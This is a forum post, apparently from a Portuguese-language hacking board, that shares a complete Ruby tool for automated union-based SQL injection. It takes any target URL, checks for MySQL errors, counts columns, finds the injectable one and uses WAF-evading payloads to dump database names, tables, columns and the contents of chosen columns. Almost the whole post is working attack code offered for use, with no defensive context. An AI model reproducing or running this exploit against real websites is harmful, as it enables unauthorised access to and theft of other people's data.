SQL Injection auto exploit
By sQuo
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
#!/user/bin/ruby require'open-uri' =begin Auto Sql Injection Exploiter By Hamza Killer xD :D To Sec4ever && s3ck.net TO : Uzun-Dz , R0x , Black-id xD This tools is public_version inject union based (intiger and string) the priv8 tools inject blind sql && union based && error based xD soon it will be public xD my eng khkhkhk =end ### Homee Functiop class String def red; "\033[31m#{self}\033[0m" end def green; "\033[32m#{self}\033[0m" end def brown; "\033[33m#{self}\033[0m" end def gray; "\033[37m#{self}\033[0m" end def bg_black; "\033[40m#{self}\0330m" end def bg_red; "\033[41m#{self}\033[0m" end def bg_green; "\033[42m#{self}\033[0m" end def bg_brown; "\033[43m#{self}\033[0m" end def bg_blue; "\033[44m#{self}\033[0m" end def bg_magenta; "\033[45m#{self}\033[0m" end def bg_cyan; "\033[46m#{self}\033[0m" end def bg_gray; "\033[47m#{self}\033[0m" end end def home() text=[ "[*]=========================================[*]", "[*] Auto Sql Injection Exploit V 1.0[*]", "[*] H A M Z A K I L L E R[*]", "[*] Hlyzidi[at]gmail[dot]com[*]", "[*]=========================================[*]" ] for oo in text puts oo.red sleep(0.1) end end ## function 0 def get_con(url) f = open(url) x=f.readlines.join return x end ## Function 1 def url_x(url) if(url =~ /http:\/\//) url=URI(url) elsif (url =~ /https:\/\//) puts "Tool NOt work with ssl sorry " exit else url=URI("http://#{url}") end end ## function 2 def infected_1(url) x=get_con(url) if (x=~ /Unknown column/i || x=~ /on line/i || x=~ /Warning MySQL/i|| x=~ /You have an error in your SQL syntax/i|| x=~/Warning MySQL/i || x=~/Warning: mysql_num_rows():/i) return true end end ## Function 3 def get_all_data(url,clm,pay) xssp="#{url}#{pay}" payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,SchEmA_NamE,0x68616d7a6178647a)*/" begin xuxrl=pay.sub("#{clm}","#{payload}") xurl=URI("#{url}#{xuxrl}+FroM+iNForMaTion_SchEmA.SchEmAta--+-") rescue print "some thing Wrong" end xd=get_con(xurl) data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i) for dat in data.uniq puts "|| [+] #{dat[0]}" end end ## function 4 def url_pasq(ur,col) p=ur.sub("=","=-"); po="+/*!12345UNION*/+/*!12345SELECT*/+1"; while (i=2 < col) i=2+1 pppp="#{p}#{po}+,#{i}--+-" return pppp end end ### def get_data(url,clm,pay) payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,database(),0x2f3a3a2f,version(),0x2f3a3a2f,user(),0x68616d7a6178647a)*/" xuxrl=pay.sub("#{clm}","#{payload}") xurl=URI("#{url}#{xuxrl}") xd=get_con(xurl) data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i) begin for dat in data[0] xd=dat.split("/::/") database=xd[0] version=xd[1] user=xd[2] puts "[+] Db server user :#{user} ".green puts "[+] Database version : #{version} ".green puts "[+] current Database : #{database}".green end end rescue puts "Error !!!!!" end ### Function for Hex Encoding def hex_string(url,clm,pay,xstring) xssp="#{url}#{pay}" payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,%270x%27,HEX(%27#{xstring}%27),0x68616d7a6178647a)*/" xuxrl=pay.sub("#{clm}","#{payload}") xurl=URI("#{url}#{xuxrl}+--") xd=get_con(xurl) data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i) for dat in data.uniq return dat[0] end end ##### Function For Get All tables def get_all_tables(url,clm,pay,db) xssp="#{url}#{pay}" payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,table_name,0x68616d7a6178647a)*/" xuxrl=pay.sub("#{clm}","#{payload}") xurl=URI("#{url}#{xuxrl}+from+information_schema.tables+where+table_schema=#{db}--+-") xd=get_con(xurl) data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i) for dats in data.uniq for dat in dats puts "|| [+] #{dat}".brown end end end ####### Function For Get All colum def get_all_clum(url,clm,pay,db,table) xssp="#{url}#{pay}" payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,column_name,0x68616d7a6178647a)*/" xuxrl=pay.sub("#{clm}","#{payload}") xurl=URI("#{url}#{xuxrl}+FROM+INFORMATION_ScheMa./*!columNs*/+WhErE+tablE_scheMa=#{db}+and+table_name=#{table}--+-") xd=get_con(xurl) data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i) for dat in data.uniq puts "[+] #{dat[0]}".green end end ######## Finily GEt All Data def get_all_data_bitch(url,clm,pay,db,table,colm) xssp="#{url}#{pay}" payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,#{colm},0x68616d7a6178647a)*/" xuxrl=pay.sub("#{clm}","#{payload}") xurl=URI("#{url}#{xuxrl}+FroM+#{db}.#{table}--+-") xd=get_con(xurl) data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i) for dat in data.uniq puts "[+] #{dat[0]}" end end ##### ##########Chek if vul ############ home() print("# Eenter Url ->") begin urld=gets.chomp if !(urld) print "# Error !!!!!!!!!" exit end url=url_x(urld) x=infected_1("#{url}'") rescue print "# Error !!!!!!!!!\n" exit end if(x) print"[+] #{url} => SQl Injection Found\n".bg_blue print"[+] injection type is Integer\n".bg_blue else puts"[-] Not Vul ".bg_cyan puts"[*] Or injection type is string".bg_cyan end ######################################### #### Get column Infected for i in 1..50 urls=URI("#{url}+Order+by+#{i}--+-") x=get_con(urls) if (x=~ /Unknown column/i || x=~ /on line/i || x=~ /Warning MySQL/i|| x=~ /You have an error in your SQL syntax/i|| x=~/Warning MySQL/i || x=~/Warning: mysql_num_rows():/i|| x=~/in 'order clause'/i) clnb=i-1; break sleep(0.2) end end #### #### print"[+] columns number : #{clnb}\n".bg_blue #### NOw GEt Infected columns print"[+] Searching for infected columns ...........\n".bg_red p=urld.sub("=","=-"); po="+/*!12345UNION*/+/*!12345SELECT*/+"; all_url="#{p}#{po}" dz=[] begin for i in (2..clnb).to_a dz.push(i) sleep(0.00003) end rescue print "Error xD :D !!!!!".bg_red exit end clm_num=dz.join(",") clm_num="1,#{clm_num}" x_clminf="#{all_url}#{clm_num}--" for ix in (1..clnb) xpx=clm_num.sub("#{ix}",'0x68616d7a6178647a'); ppps=URI("#{all_url}#{xpx}--") x_url=get_con(ppps) if(x_url =~ /hamzaxdz/i) p_ss=ix break end sleep(0.00003) end puts "[+] Found infected columns is : #{p_ss}".bg_brown # print All information get_data(all_url,p_ss,clm_num) # GET All Database into=["||==================================================||", "||=========== databases ===========||", "||==================================================||"] xbar=["||==================================================||"] for ine in into puts ine sleep(0.2) end get_all_data(all_url,p_ss,clm_num) for ine in xbar puts ine sleep(1) end print('# PLZ chois Database :') data_user=gets.chomp ## Now Select Database And Fuck It database_hex=hex_string(all_url,p_ss,clm_num,data_user) ## Database Hex_encode ## Now Extreact Tables into=["||==================================================||", "||=========== Tables ===========||", "||==================================================||"] for ine in into puts ine sleep(0.2) end get_all_tables(all_url,p_ss,clm_num,database_hex) for ine in xbar puts ine sleep(1) end print('# PLZ Enter Table :') tab_user=gets.chomp table_hex=hex_string(all_url,p_ss,clm_num,tab_user)### Hexing This Fuck xD into=["||==================================================||", "||=========== columns ===========||", "||==================================================||"] for ine in into puts ine sleep(0.2) end get_all_clum(all_url,p_ss,clm_num,database_hex,table_hex) for ine in xbar puts ine sleep(1) end ### Now Bitch Start Work And Get All Data Fuck Fuck Zhhhhh:D a=true while a print "# Enter columns ->" clm=gets.chomp begin get_all_data_bitch(all_url,p_ss,clm_num,data_user,tab_user,clm) rescue print "Error !!!!!!\n" end end
Comment